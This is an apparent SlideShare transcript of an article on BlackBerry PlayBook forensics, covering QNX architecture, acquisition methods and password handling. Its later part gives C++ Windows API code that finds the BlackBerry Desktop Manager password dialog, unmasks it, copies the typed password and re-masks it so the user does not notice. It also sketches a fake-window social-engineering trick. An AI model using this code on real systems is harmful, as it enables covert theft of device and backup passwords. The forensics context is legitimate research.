Don’t Be Mocked Secure Your System
1 / 108

Chapter 1

BlackBerry Playbook – New Challenges
Say your client is charged wit...
Don’t Be Mocked Secure Your System
2 / 108

Mobile Forensics
As mobile phones become so ubiquitous and play such large soc...
Don’t Be Mocked Secure Your System
3 / 108

• Support for Android 2.3 apps
• Documents To Go and Print To Go
• Native Emai...
Don’t Be Mocked Secure Your System
4 / 108

• threads
• message passing
• signals
• clocks
• timers
• interrupt handlers
•...
Don’t Be Mocked Secure Your System
5 / 108

Every QNX system also provides a simple RAM-based file system that allows read/...
Don’t Be Mocked Secure Your System
6 / 108

Figure 1.2: Network architecture
At the driver layer, there are interfaces for...
Don’t Be Mocked Secure Your System
7 / 108

• rule grouping: to apply different groups of rules to different packets
• sta...
Don’t Be Mocked Secure Your System
8 / 108

BlackBerry Playbook Challenges
A BlackBerry is a handheld mobile device engine...
Don’t Be Mocked Secure Your System
9 / 108

have upset because time is counting and no one can be sure if setting GUI is t...
Don’t Be Mocked Secure Your System
10 / 108

• scaled preview for typed character through virtual keyboard. It works too a...
Don’t Be Mocked Secure Your System
11 / 108

Figure 1.4: Class name & Window Text of controls (v4-v5) - part I

Figure 1.5...
Don’t Be Mocked Secure Your System
12 / 108

Figure 1.6: Class name & Window Text of controls (v4-v5) - part III

Figure 1...
Don’t Be Mocked Secure Your System
13 / 108

beginning with the one following the specified child window. It is known as "F...
Don’t Be Mocked Secure Your System
14 / 108

//correct a program version:
//if NULL then BlackBerry Manager v4 or BlackBer...
Don’t Be Mocked Secure Your System
15 / 108

//ReDraw EditBox
//InvalidateRect(pass_hwnd, 0, true);
//If action is unsucce...
Don’t Be Mocked Secure Your System
16 / 108

Figure 1.9: Stolen password (v4)- part II
If we try to use this code in Vista...
Don’t Be Mocked Secure Your System
17 / 108

Figure 1.10: Class name & Window Text of controls (v6) - part I

Figure 1.11:...
Don’t Be Mocked Secure Your System
18 / 108

Figure 1.12: Class name & Window Text of controls (v6) - part III

Figure 1.1...
Don’t Be Mocked Secure Your System
19 / 108

Listing 5. Main definitions
void __fastcall TForm1::FormCreate(TObject *Sender...
Don’t Be Mocked Secure Your System
20 / 108

FreeLibrary(hModule);
}
}
}
//-----------------------------------------------...
Don’t Be Mocked Secure Your System
21 / 108

//Caption of Window
char *external = "Device Password Required";
//Catch a Wi...
Don’t Be Mocked Secure Your System
22 / 108

SendMessage(Wnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw);
//store in new vari...
Don’t Be Mocked Secure Your System
23 / 108

Figure 1.14: Stolen password (v6) - part I

Figure 1.15: Stolen password (v6)...
Don’t Be Mocked Secure Your System
24 / 108

Figure 1.16: BlackBerry Desktop Manager’s Handlers – part I

Figure 1.17: Bla...
Don’t Be Mocked Secure Your System
25 / 108

Wi-Fi logs stored IP, DNS, subnet mask; information about (un-)successful att...
Don’t Be Mocked Secure Your System
26 / 108

[n]dev_mode_waiting:b:true
@versions
air_version::3.1.0.38
flash_version::11....
Don’t Be Mocked Secure Your System
27 / 108

Figure 1.20: Wi-Fi Info

Figure 1.21: Logs
Wi-Fi Logs
***********************...
Don’t Be Mocked Secure Your System
28 / 108

******
DEVICE INFORMATION
******
> Physical Address: e8:xx:xx:xx:xx:xx
> Devi...
Don’t Be Mocked Secure Your System
29 / 108

Backup Data
Managing with backup starts with BlackBerry Desktop Manager that ...
Don’t Be Mocked Secure Your System
30 / 108

stage.align = StageAlign.TOP_LEFT;
stage.scaleMode = StageScaleMode.NO_SCALE;...
Don’t Be Mocked Secure Your System
31 / 108

these files from internal/external storage. Pictures are more inquisitive as c...
Don’t Be Mocked Secure Your System
32 / 108

Table 1.2: Table 2. Extractable Data
Type
Address Book
Calendar Events
Call H...
Don’t Be Mocked Secure Your System
33 / 108

On the Net
• To Get Round to the Heart of Fortress. Hakin9 Extra. Yury Chemer...
Don’t Be Mocked Secure Your System
34 / 108

About the author

Yury Chemerkin Graduated at Russian State University for th...
Blackberry playbook – new challenges
Upcoming SlideShare
Loading in …5
×

Blackberry playbook – new challenges

878 views
712 views

Published on

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
878
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
7
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Blackberry playbook – new challenges

  1. 1. Don’t Be Mocked Secure Your System 1 / 108 Chapter 1 BlackBerry Playbook – New Challenges Say your client is charged with trade secret theft. What if you could show electronic evidence that, at the time of the theft, your client was in thousand miles away from the crime scene? Or driving down the freeway, talking on his mobile phone? Or sending mundane text messages to his spouse? Or taking photos at the beach? If this sounds appealing, you need to learn about mobile device forensics. What you will learn. . . • What’s new on BlackBerry Playbook Forensics area • How many differences are between BlackBerry Smartphone and Tablet forensics techniques What you should know. . . • Basic knowledge about Forensics (Classic and Live) • Basic knowledge about BlackBerry Forensics • Basic knowledge about BlackBerry PlayBook Mobile phone proliferation in our societies is on the increase. Advances in semiconductor technologies related to mobile phones and the increase of computing power of mobile phones led to an increase of functionality of mobile phones while keeping the size of such devices small enough to fit in a pocket. This led mobile phones to become portable data carriers. This in turn increased the potential for data stored on mobile phone handsets to be used as evidence in civil or criminal cases. Mobile devices – cell phones, BlackBerrys, Androids, iPads – are everywhere. People use them to take photographs, send texts and emails, update Facebook, consult maps, search the web – the list goes on. As they do this, however, their mobile devices often are quietly making records and generating evidence of those activities. For better or for worse, this makes mobile devices perhaps the richest source of evidence about the people that use them. At present, the BlackBerry holds the palm of insufficient security examination despite of existing approaches more than Android (because Android/iOS/Windows was not developed in consideration of secure even) but all security techniques implemented in these mobile devices are indecisive argument on security. It means its argument to forensics. All security agencies are facing with dealing with mobiles forensics repeatedly. Forensics tools may give incredible opportunity to gain all kind of data but there are too many slight objections. Until companies go in only one of ways - classic forensics or live monitoring (DLP or else) - it fails, because forensics field need more effective synthesis of mechanism.ed to highlight whether one techniques provide more easy implementation, investigation and handling or not, what common differences examiners may encounter and what they should as concept be involved to forensic handling with these platforms because a Playbook OS is completely a new approach.
  2. 2. Don’t Be Mocked Secure Your System 2 / 108 Mobile Forensics As mobile phones become so ubiquitous and play such large societal role there is a high probability that these same devices will be part of those investigations. A mobile phone can be tied to crime in four ways: • as a communication tool in the process of committing a crime. • as a storage device providing evidence of a crime. • as a storage device that contains victim information. • It can be a means of committing a crime Mobile devices can communicate constantly, a very real concern exists that the data you are interested in (especially email, texts, and internet records) could be crowded out by newly arriving data and disappear if the device is not rendered incommunicative. This could be as simple as turning the device off, but you should be aware the loss of data in RAM memory or activation of password protections. The same effect could happen if the device’s batteries run out. Nowadays mobile devices provide amount of features to integrate all possible communications following aggregation with data on BlackBerry as well as Android. The native and third party applications often connect to the email, maps IM messenger and social statutes. They keep users connected and do far more. The logical acquisition manages with known data types for any user and this data set rarely differs among of iOS, Android or BlackBerry. As mentioned above these data contain messages (SMS/MMS/Email/IM), social network data, contacts, calendar, phone logs, password and bank wallet and other financial application data, media data (Audio/Photos/Videos) and other data even file structure, browser data (web history as a timeline and bookmarks), and shared folders. The BlackBerry apps environment is known is wide-bind and amazing than Android. On another hand, Android has enough not only third-party applications that is very different but also a hundreds variations depend on manufacturer. As opposed to the BlackBerry Smartphone, the BlackBerry PlayBook is on QNX OS offers implemented modern technologies take away from real development. All above brings in the zoo-world of mobile phones and highlights issues of misusing security techniques in development area. New special skills that forensics experts required rarely based on experience only. Each year the classic forensics techniques face on a huge problem while live forensics (or live monitoring) gives new opportunities to manipulate with data. Sometimes, company IT Policy or OS vision may be helpful to be sure that no triggers will break investigation. Physical approach is trust but nonoperability, while logical is more dangerous because of synchronization process via network, cellular, and OTA. There are too many cases when it cannot afford not to use prevent methods or tools to simplify the classic forensics. This article describes technical problems encountered by forensics as well as different live solutions maybe useful and those became "right" way with vendors’ development. Playbook Architecture We have already known that QNX-based OS is background for BlackBerry 10 (that replaces old BlackBerry OS after version 7) and BlackBerry Tablet. BlackBerry Tablet OS based on the QNX Neutrino real-time OS featured by running Adobe AIR and WebWorks applications as well as Android applications written in Java instead of BlackBerry Java applications (smartphones apps). Below are main features that available on the Playbook • BlackBerry Bridge – the ability to connect to, and access data on, a BlackBerry smartphone using internet. – Document editing through BlackBerry Bridge – BlackBerry Messenger, Push email, contacts, calendar, etc. via BlackBerry Bridge • Video chat capability with other BlackBerry PlayBook users • Adobe Flash and Adobe AIR • ZIP Attachment Support • Application created using NDK
  3. 3. Don’t Be Mocked Secure Your System 3 / 108 • Support for Android 2.3 apps • Documents To Go and Print To Go • Native Email, Calendar, Contacts app • File Manager • Social network integration with Facebook, Twitter, LinkedIn • Full device encryption • Screenshots saved in lossless PNG format. Figure 1.1: BlackBerry Playbook The BlackBerry Tablet OS is a microkernel OS implements the minimum amount of software in the kernel space and run other processes in the user space outside of the kernel space. By running most processes in the user space, the BlackBerry Tablet OS can manage unresponsive processes in isolation from others. This helps prevent damage to the operating system and other applications. The primary goal of QNX Neutrino is to deliver the open systems POSIX API in a scalable form suitable for a wide range of systems—from tiny, resource-constrained embedded systems to high-end distributed computing environments that is fundamental for mission-critical applications. QNX Neutrino is ideal for embedded real-time applications. It can be scaled to very small sizes and provides multitasking, threads, priority-driven scheduling, and fast context-switching—all essential ingredients of an embedded real-time system. Any thread on any machine in the network can directly make use of any resource on any other machine. From the application’s perspective, there is no difference between a local or remote resource—no special facilities need to be built into applications to allow them to make use of remote resources. Users may access files anywhere on the network, take advantage of any peripheral device, and run applications on any machine on the network (provided they have the appropriate authority). Processes can communicate in the same manner anywhere throughout the entire network. Thus, the QNX Neutrino microkernel has kernel calls to support the following:
  4. 4. Don’t Be Mocked Secure Your System 4 / 108 • threads • message passing • signals • clocks • timers • interrupt handlers • semaphores • mutexes • condition variables • barriers The key advantage gained by adding memory protection to embedded applications, especially for mission-critical systems, is improved robustness. With memory protection, if one of the processes executing in a multitasking environment attempts to access memory that hasn’t been explicitly declared or allocated for the type of access attempted, the MMU hardware can notify the OS, which can then abort the thread (at the failing/offending instruction). This protects process address spaces from each other, preventing coding errors in a thread in one process from damaging memory used by threads in other processes or even in the OS. During development, common coding errors (e.g. stray pointers and indexing beyond array bounds) can result in one process/thread accidentally overwriting the data space of another process. If the overwriting touches memory that isn’t referenced again until much later, you can spend hours of debugging—often using in-circuit emulators and logic analysers—in an attempt to find the guilty party. The microkernel architecture of the BlackBerry Tablet OS supports the following features: • designed to be tamper resistant means if the kernel integrity test reveals damage to the kernel, the BlackBerry Tablet OS does not start. • designed to be resilient means restarting any process without negatively affecting others because of separation user and kernel space. • designed to be highly secure throughout validation requests for system resources like access to the camera via displaying a dialog box to grant or refuse access to that capability. • designed to verify the authenticity of an application means to be signed by the RIM Signing Authority with developer certificate. Going further to details and uncover QNX architecture. File systems QNX Neutrino provides a rich variety of file systems. Like most service-providing processes in the OS, these file systems execute outside the kernel; applications use them by communicating via messages via POSIX API open() , close() , read() , write() , lseek() , etc. and checking for permissions and access authorizations. When a pathname is resolved, the process manager contacts all the file-system resource managers that can handle some component of that path. The result is a collection of file descriptors that can resolve the pathname. If the pathname represents a directory, the process manager asks all the file systems that can resolve the pathname for a listing of files in that directory when readdir() is called else resolves the pathname is accessed. File systems categorized into the following classes: • Block that operates on block devices like hard disks and CD-ROM drives • Network that provides network file access to the file systems on remote host computers.
  5. 5. Don’t Be Mocked Secure Your System 5 / 108 Every QNX system also provides a simple RAM-based file system that allows read/write files to be placed under /dev/shmem that is not actually a file system and used in tiny embedded systems where persistent storage across reboots is not required, yet where a small, fast, temporary-storage file system with limited features is called for. The RAM file system does not support hard or soft links or directories but possible to create a link to it by using process-manager links, e.g. create a link to a RAM-based /tmp directory: ln -sP /dev/shmem /tmp following "procnto" to create a process manager link to /dev/shmem known as /tmp. According to minimizing the size of the RAM file system code inside the process manager, this file system does not include file locking or directory creation features. The Network File System (NFS) allows a client workstation to perform transparent file access over a network, operate on server files across a variety of OS. NFS operates by using remote procedure calls (RPC) and TCP/IP for its transport. All these implementations means that: • file systems may be started and stopped dynamically. • multiple file systems may run concurrently. • applications are presented with a single unified pathname space and interface, regardless of the configuration and number of underlying file systems. • a file system running on one node is transparently accessible from any other node. Networking Architecture The networking services execute outside the kernel too and allow: • network drivers to be started and stopped dynamically • protocols to run together in any combination The network subsystem relies on network manager (io-pkt-v4, io-pkt-v4-hc, or io-pkt-v6-hc). On bottom are drivers provided the passing data to and receiving data from the hardware. The drivers hook into a multi-threaded layer-2 component (that also provides fast forwarding and bridging capability) that ties them together and provides a unified interface for directing packets into the protocol-processing components of the stack. This includes, for example, handling individual IP and upper-layer protocols such as TCP and UDP. The resource manager is on top of the stack and looks like inter-level between the stack and user applications where developers find a well-known interface i.e. open(), read(), write(), and ioctl(). A detailed view of the io-pkt architecture is on picture 2.
  6. 6. Don’t Be Mocked Secure Your System 6 / 108 Figure 1.2: Network architecture At the driver layer, there are interfaces for Ethernet traffic and for 802.11 management frames from wireless drivers. Here is hardware crypto API that allows the stack to use a crypto offload engine when it’s encrypting or decrypting data for secure links. In addition to drivers and protocols, the stack also includes hooks for packet filtering: • Berkeley Packet Filter (BPF) interface. A socket-level interface that lets you read and write, but not modify or block, packets, and that you access by using a socket interface at the application layer (see http://en.wikipedia.org/wiki/Berkeley_Packet_Filter). This is the interface of choice for basic, raw packet interception and transmission and gives applications outside of the stack process domain access to raw data streams. • Packet Filter (PF) interface. A read/write/modify/block interface that gives complete control over which packets are received by or transmitted from the upper layers and is more closely related to the io-net filter API IP used for everything from simple tasks e.g. remote login to more complicated tasks e.g. delivering real-time stock quotes. QNX provides the following stack configurations: • NetBSD TCP/IP stack supports forwarding, broadcast and multicast, hardware checksum support, routing sockets, Unix domain sockets, multilink PPP, PPPoE, supernetting (CIDR), NAT/IP filtering, ARP, ICMP, and IGMP, as well as CIFS, DHCP, AutoIP, DNS, NFS (v2 and v3 server/client), NTP, RIP, RIPv2, and an embedded web server • Enhanced NetBSD stack with IPsec and IPv6 includes previous but targeted at the new generation of mobile and secure communications - IPv6 and IPsec mainly for VPNs over IPsec tunnels IKE (ISAKMP/Oakley) key management protocol for establishing secure host associations. The BSD Socket API was the obvious choice for QNX Neutrino that is a standard API for in the UNIX world like Winsock API in Windows. All the routines that application programmers including well known: accept(), bind(), bindresvport(), connect(), dn_comp(), dn_expand(), endprotoent(), endservent(), gethostbyaddr(), gethostbyname(), getpeername(), getprotobyname(), getprotobynumber(), getprotoent(), getservbyname(), getservent(), getsockname(), getsockopt(), herror(), hstrerror(), htonl(), htons(), h_errlist(), h_errno(), h_nerr(), inet_addr(), inet_aton(), inet_lnaof(), inet_makeaddr(), inet_netof(), inet_network(), inet_ntoa(), ioctl(), listen(), ntohl(), ntohs(), recv(), recvfrom(), res_init(), res_mkquery(), res_query(), res_querydomain(), res_search(), res_send(), select(), send(), sendto(), setprotoent(), setservent(), setsockopt(), shutdown(), socket(). BlackBerry Playbook provides a NAT that includes such features as:
  7. 7. Don’t Be Mocked Secure Your System 7 / 108 • rule grouping: to apply different groups of rules to different packets • stateful filtering: an optional configuration to allow packets related to an already authorized connection to bypass the filter rules • NAT—for mapping several internal addresses into a public (Internet) address, allowing several internal systems to share a single Internet IP address. • proxy services: to allow ftp, NetBIOS, and H.323 to use NAT • port redirection: for redirecting incoming traffic to an internal server or to a pool of servers. User Interface The presence of the Shared Task Model and its use as a communication medium between the user and the Tablet recognition system affords the potential to create a wide variety of different user interfaces, each customized for different usage environments and manipulation capabilities. Playbook benefits are in it designed to provide the flexibility that comes from providing an intelligent supervisor and intelligent subordinates the ability to collaborate flexibly about the precise task and method that the subordinate is to perform. This interaction style will provide multiple benefits for the human and machine collaboration, including: • Increased user satisfaction and acceptance • Decreased human skill loss • More balanced workload • More accurate and balanced automation reliance decisions • Increased situation awareness (relative to a more fully automated or autonomously adaptive automation approach) • Improved human and machine system performance (especially in flexible and unpredictable domains which offer enough time for human awareness and planning) Forensics techniques There are many different ways to analyze forensically a mobile device: • Physical acquisition technique is a bit-by-bit copy of an entire physical stories, doing a full physical copy (i.e., all the bits in memory, not just the files) of the entire memory store on the device. This method, which can be very difficult to perform properly, allows deleted files and any data remnants present (i.e., in unallocated memory or file system space) to be examined, which otherwise would go unfound • Logical acquisition technique is a bit-by-bit copy of logical storage objects (e.g., directories and files). It has the advantage of simplifying for a tool to extract and organize but does not produce any deleted information except database file cases which does not overwrite the information but simply marks it as deleted and available for later overwriting. • Using commercially available forensic software tools (as extend previous) which, as time passes, are becoming increasingly more capable and sophisticated. This software generally makes a full copy of all the files on the device (i.e., a "logical" copy), which can result in a capture of most user-created data, and even some deleted data. • Manual acquisition technique is user interface utilizing to get pictures of data from the screen, simply manipulating the phone (by navigating through the email, photographs, or contacts list, for example) while videotaping and/or photographing the results. While this may be sufficient for some cases, obvious disadvantages include the fact that it involves manipulating and changing the very evidence you are seeking to preserve. The disadvantage is that only data visible to the operating system can be recovered and that all data are only available in form of pictures. • Backup - This technique is relatively easy, and it allows a significant amount of user-created data (photographs, songs, and emails, texts) to be preserved. Care must be taken, however, to modify the settings so that data from the "synced" computer does not overwrite the data on the device. Like previous, it also involves some manipulation, and thus alteration, of the evidence.
  8. 8. Don’t Be Mocked Secure Your System 8 / 108 BlackBerry Playbook Challenges A BlackBerry is a handheld mobile device engineered for email. All models now come with a built-in mobile phone, making the BlackBerry an obvious choice for users with the need to access their email from somewhere besides the comfort of a desk chair. The BlackBerry device is always on and participating in some form of wireless push technology. Because of this, the BlackBerry does not require some form of desktop synchronization like the other mobile device does. BlackBerry Playbook is an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring and contacts directly from a tethered BlackBerry phone, the PlayBook meets the same encryption standards as the BlackBerry phone. It is the first (and as of September 2011, the only) tablet device to receive FIPS 140-2 certification, which makes it eligible for use by U.S. federal government agencies. In addition, the Australian government also approved the use of PlayBook as the only tablet that meets its security standard. Playbook does not have neither push technology for email/calendar/else, only IMAP4 and POP3 except MS Exchange link nor BIS except BlackBerry Mobile Fusion that did not replace BES but one more add-on to manage nonblackberry smartphone devices and BES existed in company. In addition, email and social accounts will broke and ask you reenter your password that may help to discard pushing data. Figure 1.3: Broken Mail Network Isolation One of the main ongoing considerations for analysts is preventing the device from any network changes that is sometimes achievable for PlayBook where there is no cellular connection, but only a network connection. As mentioned early it might bring in new data. However, any interaction with the devices like plugging and unplugging the device will modify them. The first idea is dismounting encryption or preventing of blocking to examine the device while it is running. PlayBook as another else device is difficult to analyze forensically without negative affecting because of storage cannot be easily removed, storage is only internal and there no external storage like SD-card as it is for BlackBerry smartphone. The worst case in forensics is remote wiping initiated or data added/overwritten outside control from any triggers often SMS or incoming call is impossible through BlackBerry Bridge even: SMS for BlackBerry Bridge simply didn’t developed and incoming call notification cannot be caught as well as all Bridge’s events throughout API. Nevertheless, forensics experts still have to prevent a connection. A powerful way "airplane mode" (or the same named in different way) helps. Android problem to stop network communications is awful GUI and forensics officer should press and hold the Power off button and select Airplane mode at first (if this hotkey will work) or then press Menu (from the home screen), Settings, finally, the Wireless option which is generally near the top. It’s only to disable cellular network while to block wireless connection like Bluetooth or Wi-Fi he have to walk out home screen to the settings that
  9. 9. Don’t Be Mocked Secure Your System 9 / 108 have upset because time is counting and no one can be sure if setting GUI is the same among devices. BlackBerry allows do it very quickly by clicking on tray on home screen. BlackBerry Push-Technology for Playbook BlackBerry (smartphone) was primary engineered for email and come with a built-in mobile phone providing access to the email from anywhere. It is always on and participating in wireless push-technology and does not require any kind of desktop synchronization like the others. The first step is turn the radio off, or a better solution is to take the device to an in area where the signal cannot be received, as the BlackBerry device is not really "off" unless power is removed for an extended period. If the blackberry powered back off then any items that were in the queue waiting to be pushed to the device could possibly be pushed before you could stop them. The BlackBerry PlayBook is an add-on for BlackBerry smartphone only, because BlackBerry Bridge accesses mail, calendaring and contacts directly from a tethered BlackBerry phone. Since the Playbook is not all always on there is rarely types of information pushed to it following overwriting or deletion. The PlayBook does not have neither push technology for email/calendar/else (only IMAP4 and POP3 except MS Exchange link) nor BIS except BlackBerry Mobile Fusion that managed non-blackberry smartphone devices and BES existed in company. In addition, email and social accounts may broke and ask user reenter his password that may help to discard pushing data. It means the PlayBook is not all always on there is rarely types of information pushed to it following overwriting or deletion. As opposed to smartphone, Playbook was made filled by stand-alone applications that mighty use internet connect in standby mode or when applications swiped down; by default, Playbook has option to restrict activity in this state. The Playbook address book application is filled Facebook, Twitter and LinkedIn connections, but synchronizing has never happened before you run application and wait until it is done. Sometimes it takes 1 minute even or more. Password Protection BlackBerry devices come with password protection and attempt limit (by defaults - five out ten, min - three out ten; a PlayBook case may differ from five to ten where "ten" is often for PlayBook device and "five" is for BlackBerry Desktop Software and plugged PlayBook). If it is exceed, device will wipe then (factory resetting). All data stored on external memory will keep because that’s not part of the factory configuration if talking about smartphone not PlayBook, which has not external storage. So it will not reformat the micro SD card but if you have a BlackBerry Playbook, you will get factory defaults at all. Password Extraction/Bypassing Brute-force Accessing encrypted information stored in password-protected backups it possible via Elcomsoft products that offer to restore the original password of backup and device. The toolkit allows eligible customers acquiring bit-to-bit images of devices’ file systems, extracting phone secrets (passcodes, passwords, and encryption keys) and decrypting the file system dump. It also reads BlackBerry Wallet data and Password Keeper data. The recovery of BlackBerry password is possible only if the user-selectable Device Password security option enabled to encrypt media card data. As the Playbook poor for native application, you could find databases with password in shared folders put by third-party applications. Live methods Techniques discussed in my articles (mainly summarized in "To get round to the heart of fortress", "When Developer’s API Simplify User-Mode Rootkits Developing", "When Developers API Simplify User-Mode Rootkits Development - Part II") are still effective and very useful. These techniques are: • default feature to show password without asterisks that’s a possible to screen-capture. If "screenshot" API isn’t disable it works (by defaults it’s allowed)
  10. 10. Don’t Be Mocked Secure Your System 10 / 108 • scaled preview for typed character through virtual keyboard. It works too and maybe screenshoted. As further consideration agent may XOR two screenshots and extract preview of pressed key as well as typed text. • stealing password during synchronization from BlackBerry Desktop Software. It works because of security issues of Windows API. Moreover, it works not only to grab device password but backup password too. • redrawing fake-window to catch typed password on device. Some social engineering aspect to announce "something is crashed and lock the device, please unlock by re-entering a password". The last techniques (stealing) work on PlayBook as well. I will remind how to extract password from BlackBerry Desktop Software in real-time. Every device is going to synchronize with PC sometimes. Pass over a Mac and move to Windows. Windows XP and Windows Vista (just in case), Windows 7 make our first target group (most popular). BlackBerry Device Manager (as known in version 4.xx or 5.xx) and BlackBerry Desktop Manager make second target group (if we are talking about version 6.xx). It is a minor target than major target is password field of textbox’s software. Unfortunately, we cannot get a screen-capture. So, try to use a WINAPI functional. First, we need recall a knowledge about system messages and system object. What does edit box look like? It’s simple field for typing character ~32k in length that has a "password char" property. It has default #0 value or NULL or 0’. Other masking character could be a black circle, asterisk, or anything else. 0x25CF is Unicode character of black circle. Every system object like modal window or textbox responds to API subroutine such as "SendMessage" or "PostMessage". Both subroutines send the specified message to a window or windows. However, if you need to post a message in the message queue associated with a thread you should use the "PostMessage" function. Parameters’ syntax is the same. First parameter is (Type: HWND) a handle to the window whose window procedure will receive the message. If this parameter is HWND_BROADCAST ((HWND)0xffff), the message is sent to all top-level windows in the system, including disabled or invisible windows, overlapped windows, and pop-up windows; but the message is not sent to child windows. Second parameter is (Type: UINT) a message to be sent. For lists of the system-provided messages, see System-Defined Messages. Other two parameters (Type: WPARAM, Type: LPARAM) are represent an additional message-specific information. It is easy to guess that we need in WM_GETTEXT (0x000D) message. It copies the text that corresponds to a window into a buffer provided by the caller. Window’s caption or "text field’s" content could copy with it. However, if "edit box" is masked you cannot copy text, because you get a NULL-pointer. Well then, do unmask copy and mask again (Figure 7). Back in 2003 when MS Windows "PostMessage" API Unmasked Password Weakness was found. Declared affects: • Microsoft Windows 2000 Advanced Server • Microsoft Windows 2000 Datacenter Server • Microsoft Windows 2000 Professional • Microsoft Windows 2000 Server • Microsoft Windows XP Home Edition • Microsoft Windows XP Professional A weakness has been reported in the Microsoft Windows "PostMessage" API, which could effectively allow unmasked passwords to be copied into a user’s clipboard or other buffer. "PostMessage" places a message in the message queue but does not sufficiently check the message type. EM_SETPASSWORDCHAR (Type UINT, Message) messages set the password mask character in password edit box controls. "PostMessage" abused in combination with EM_SETPASSWORDCHAR messages to cause an unmasked password placed into a buffer that could be accessed potentially through other means by an unauthorized process. Exploitation would require a malicious local process to wait for an authentication prompt sent to the local user by another application. The attacker would then have to authenticate normally. The unmasked password will copy while this is occurring. From this point, a further attack would be required to steal password credentials. Before, use this WINAPI function you should know handler of recipient object. Should to find a window’s handler a then an object’s handler. To do it either download desirable software or other use "WindowFromPoint(Mouse→CursorPos)" that return a handler of what under your mouse cursor’s coordinates. I would prefer a first way. At first, let us check it with old BlackBerry Manager (version 4 or 5).
  11. 11. Don’t Be Mocked Secure Your System 11 / 108 Figure 1.4: Class name & Window Text of controls (v4-v5) - part I Figure 1.5: Class name & Window Text of controls (v4-v5) - part II
  12. 12. Don’t Be Mocked Secure Your System 12 / 108 Figure 1.6: Class name & Window Text of controls (v4-v5) - part III Figure 1.7: Class name & Window Text of controls (v4-v5) - part IV Thus, we have a "ClassName" of password’s window "#32770" and language-sensitive caption "Device Password Required". Also, device pin and attempt’s counter are in our disposal. A "FindWindow" function retrieves a handle to the top-level window whose class name and window name match the specified strings. Its return us a window’s handler. To access to the static and edit controls use the function searches child windows,
  13. 13. Don’t Be Mocked Secure Your System 13 / 108 beginning with the one following the specified child window. It is known as "FindWindowEx". Full usage description you find on MSDN (see the Listing 1). Listing 1. Catch password dialog’s handler (first part) void __fastcall Catcher() { //ClassName of Window char *internal = "#32770"; //Caption of Window char *external = "Device Password Required"; //Catch a Window HWND window = FindWindow(internal, external); ... } But we don’t know what text we’re got in cause having 2 or 3 static name (depend on v4-v5 and v6). Z-order and "GetWindow" function is come to aid. The z-order of a window indicates the window’s position in a stack of overlapping windows. This window stack is oriented along an imaginary axis, the z-axis, extending outward from the screen. The window at the top of the z-order overlaps all other windows. The window at the bottom of the z-order is overlapped by all other windows. Function retrieves a handle to a window that has the specified relationship (Z-Order or owner) to the specified window. Two parameters should be used is in "GetWindow" Constant. Note that in BlackBerry Manager v4 (or v5) is one static for password’s attempts and device pin than in BlackBerry Desktop Manager v6 where it two separate controls (see the Listing 2). GetWindow Constant • GW_HWNDNEXT (0x0002) Identifies the window below the specified window in the Z order. • GW_HWNDPREV (0x0003) Identifies the window above the specified window in the Z order. Listing 2. Retrieve a static text from password dialog (second part) void __fastcall Catcher() { ... if ((bool)(int)window) { //Label like "Password:" char *stat_pass_text = (char *)malloc(256); //Label like "PIN of Device:" char *stat_devc_text = (char *)malloc(256); //Label like "Your attempt counts:" char *stat_attmp_text = (char *)malloc(256); //In HWND //In HWND //In HWND Z-order first of all get a password-static control stat_pass = FindWindowEx(window, NULL, "Static", "Password:"); Z-order previous of it is attemp’s count stat_attmp = GetWindow(stat_pass, 3); Z-order next of it is Device PIN stat_devc = GetWindow(stat_pass, 2); //get control’s caption for a password-static control GetWindowText(stat_pass, stat_pass_text, 256); //get control’s caption for a pin-static control GetWindowText(stat_attmp, stat_attmp_text, 256); //get control’s caption for a attemp_count-static control GetWindowText(stat_devc, stat_devc_text, 256); AnsiString DEV_PIN = AnsiString(stat_devc_text); AnsiString ATTEMPT = AnsiString(stat_attmp_text);
  14. 14. Don’t Be Mocked Secure Your System 14 / 108 //correct a program version: //if NULL then BlackBerry Manager v4 or BlackBerry Manager v5 //else everythin ’s OK - BlackBerry Desktop Manager v6 if (DEV_PIN.Length() < 1) { int pos = AnsiPos("n", AnsiString(ATTEMPT.c_str())); //extract a first part of Static (PIN) DEV_PIN = ATTEMPT.SubString(1, pos - 1); //extract a second part of Static (attempt’ count) AnsiString ATTEMPT = ATTEMPT.SubString(pos + 1, ATTEMPT.Length() pos); } ← free(stat_devc_text); free(stat_attmp_text); free(stat_pass_text); ... } ... } After it copied, get an edit’s handler and send via "PostMessage" function with EM_SETPASSWORDCHAR message and NULL-parameters (WPARAM & LPARAM) to that handler. Via "SendMessage" function with WM_GETTEXT and buffer & buffer-size parameters retrieved characters from edit-box. Moreover, do not forget about masking typed chars via "SendMessageW" functional with EM_SETPASSWORDCHAR message and 0x25cf WPARAM. It strongly recommend using Unicode version of "SendMessage", else you’ve got another character than black circle (see the Listing 3). Listing 3. Catch password from a password dialog (third part) void __fastcall Catcher() { ... if ((bool)(int)window) { ... Application->ProcessMessages(); //get handler of EditBox HWND pass_hwnd = FindWindowEx(window, NULL, "Edit", NULL); //Check desirable EditBox (with Parent Form’s Caption "Device Password Requied") if ((bool)(int)pass_hwnd) { //unset password masking PostMessage(pass_hwnd, EM_SETPASSWORDCHAR, 0, 0); //ReDraw EditBox //InvalidateRect(pass_hwnd, 0, true); //allocate memory for edit’s password char *passw = (char *)malloc(256); //Password’s borrowing SendMessage(pass_hwnd, WM_GETTEXT, (WPARAM)256, (LPARAM)passw); //store in new variable AnsiString password = AnsiString(passw); free(passw); //Don’t let him (user) see it. Paint out. //0x25CF is unicode character of black circle //(dialog boxes on Win7, XP). SendMessageW(pass_hwnd, EM_SETPASSWORDCHAR, 0x25cf, 0); ←
